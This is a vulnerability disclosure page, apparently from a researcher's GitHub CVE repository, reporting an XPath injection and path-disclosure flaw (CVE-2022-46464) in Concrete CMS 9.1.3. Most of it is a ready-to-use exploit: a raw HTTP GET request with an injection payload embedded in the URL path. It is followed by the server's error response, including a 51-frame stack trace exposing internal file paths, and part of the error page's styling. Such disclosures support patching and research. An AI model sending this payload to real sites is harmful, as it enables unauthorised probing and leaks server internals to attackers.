CVE-2022-46464: CVE-nu11secur1ty/vendors/concretecms.org/2022/concretecms-9.1.3 at main · nu11secur1ty/CVE-nu11secur1ty

concretecms-9.1.3 - XPath injection - File Path traversal****Vendor

Description:

The URL path folder 3 appears to be vulnerable to XPath injection attacks. The test payload 50539478’ or 4591=4591-- was submitted in the URL path folder 3, and an XPath error message was returned. The attacker can flood with requests the system by using this vulnerability to untilted he receives the actual paths of the all content of this system which content is stored on some internal or external server.

STATUS: HIGH Vulnerability

[+] Exploit:

GET /concrete-cms-9.1.3/index.php/ccm50539478'%20or%204591%3d4591--%20/assets/localization/moment/js HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0

[+] Response:

HTTP/1.1 500 Internal Server Error Date: Mon, 28 Nov 2022 15:32:22 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30 X-Powered-By: PHP/7.4.30 Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 592153

<!DOCTYPE html><!–

Whoops\Exception\ErrorException: include(): Failed opening ‘C:/xampp/htdocs/pwnedhost/concrete-cms-9.1.3/application/files/cache/expensive\0fea6a13c52b4d47\25368f24b045ca84\38a865804f8fdcb6\57cd99682e939275\3e7d68124ace5663\5a578007c2573b03\d35376a9b3047dec\fee81596e3895419.php’ for inclusion (include_path=’C:/xampp/htdocs/pwnedhost/concrete-cms-9.1.3/concrete/vendor;C:\xampp\php\PEAR’) in file C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php on line 26 Stack trace:

1. Whoops\Exception\ErrorException->() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php:26
2. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php:26
3. Stash\Driver\FileSystem\NativeEncoder->deserialize() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem.php:201
4. Stash\Driver\FileSystem->getData() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:631
5. Stash\Item->getRecord() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:321
6. Stash\Item->executeGet() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:252
7. Stash\Item->get() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:346
8. Stash\Item->isMiss() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Cache\Adapter\LaminasCacheDriver.php:67
9. Concrete\Core\Cache\Adapter\LaminasCacheDriver->internalGetItem() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-cache\src\Storage\Adapter\AbstractAdapter.php:356
10. Laminas\Cache\Storage\Adapter\AbstractAdapter->getItem() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:601
11. Laminas\I18n\Translator\Translator->loadMessages() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:434
12. Laminas\I18n\Translator\Translator->getTranslatedMessage() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:349
13. Laminas\I18n\Translator\Translator->translate() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Localization\Translator\Adapter\Laminas\TranslatorAdapter.php:69
14. Concrete\Core\Localization\Translator\Adapter\Laminas\TranslatorAdapter->translate() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\bootstrap\helpers.php:27
15. t() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\blocks\top_navigation_bar\view.php:47
16. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Block\View\BlockView.php:267
17. Concrete\Core\Block\View\BlockView->renderViewContents() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\AbstractView.php:164
18. Concrete\Core\View\AbstractView->render() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Area\Area.php:853
19. Concrete\Core\Area\Area->display() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Area\GlobalArea.php:128
20. Concrete\Core\Area\GlobalArea->display() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\themes\atomik\elements\header.php:11
21. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:125
22. Concrete\Core\View\View->inc() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\themes\atomik\view.php:4
23. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:329
24. Concrete\Core\View\View->renderTemplate() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:291
25. Concrete\Core\View\View->renderViewContents() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\AbstractView.php:164
26. Concrete\Core\View\AbstractView->render() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\controllers\single_page\page_not_found.php:19
27. Concrete\Controller\SinglePage\PageNotFound->view() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Controller\AbstractController.php:318
28. call_user_func_array() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Controller\AbstractController.php:318
29. Concrete\Core\Controller\AbstractController->runAction() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:188
30. Concrete\Core\Http\ResponseFactory->controller() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:95
31. Concrete\Core\Http\ResponseFactory->notFound() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:390
32. Concrete\Core\Http\ResponseFactory->collectionNotFound() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:234
33. Concrete\Core\Http\ResponseFactory->collection() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultDispatcher.php:132
34. Concrete\Core\Http\DefaultDispatcher->handleDispatch() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultDispatcher.php:60
35. Concrete\Core\Http\DefaultDispatcher->dispatch() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\DispatcherDelegate.php:39
36. Concrete\Core\Http\Middleware\DispatcherDelegate->next() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\FrameOptionsMiddleware.php:39
37. Concrete\Core\Http\Middleware\FrameOptionsMiddleware->process() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
38. Concrete\Core\Http\Middleware\MiddlewareDelegate->next() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\StrictTransportSecurityMiddleware.php:36
39. Concrete\Core\Http\Middleware\StrictTransportSecurityMiddleware->process() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
40. Concrete\Core\Http\Middleware\MiddlewareDelegate->next() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\ContentSecurityPolicyMiddleware.php:36
41. Concrete\Core\Http\Middleware\ContentSecurityPolicyMiddleware->process() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
42. Concrete\Core\Http\Middleware\MiddlewareDelegate->next() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\CookieMiddleware.php:35
43. Concrete\Core\Http\Middleware\CookieMiddleware->process() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
44. Concrete\Core\Http\Middleware\MiddlewareDelegate->next() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\ApplicationMiddleware.php:29
45. Concrete\Core\Http\Middleware\ApplicationMiddleware->process() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
46. Concrete\Core\Http\Middleware\MiddlewareDelegate->next() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareStack.php:86
47. Concrete\Core\Http\Middleware\MiddlewareStack->process() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultServer.php:85
48. Concrete\Core\Http\DefaultServer->handleRequest() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Foundation\Runtime\Run\DefaultRunner.php:125
49. Concrete\Core\Foundation\Runtime\Run\DefaultRunner->run() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Foundation\Runtime\DefaultRuntime.php:102
50. Concrete\Core\Foundation\Runtime\DefaultRuntime->run() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\dispatcher.php:45
51. require() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\index.php:2

–><html> <head> <meta charset="utf-8"> <meta name="robots" content="noindex,nofollow"/> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"/> <title>Concrete CMS has encountered an issue.</title>

<style>body {

font: 12px "Helvetica Neue", helvetica, arial, sans-serif; color: #131313; background: #eeeeee; padding:0; margin: 0; max-height: 100%;

text-rendering: optimizeLegibility; } a { text-decoration: none; }

.Whoops.container { position: relative; z-index: 9999999999; }

.panel { overflow-y: scroll; height: 100%; position: fixed; margin: 0; left: 0; top: 0; }

.branding { position: absolute; top: 10px; right: 20px; color: #777777; font-size: 10px; z-index: 100; } .branding a { color: #e95353; }

header { color: white; box-sizing: border-box; background-color: #2a2a2a; padding: 35px 40px; max-height: 180px; overflow: hidden; transition: 0.5s; }

header.header-expand { max-height: 1000px; }

.exc-title { margin: 0; color: #bebebe; font-size: 14px; } .exc-title-primary, .exc-title-secondary { color: #e95353; }

.exc-message {
  font-size: 20px;
  word-wrap: break-word;
  margin: 4px 0 0 0;
  color: white;
}
  .exc-message span {
    display: block;
  }
  .exc-message-empty-notice {
    color: #a29d9d;
    font-weight: 300;
  }

…

Reproduce:

href

Proof and Exploit:

href

Time spent

03:00:00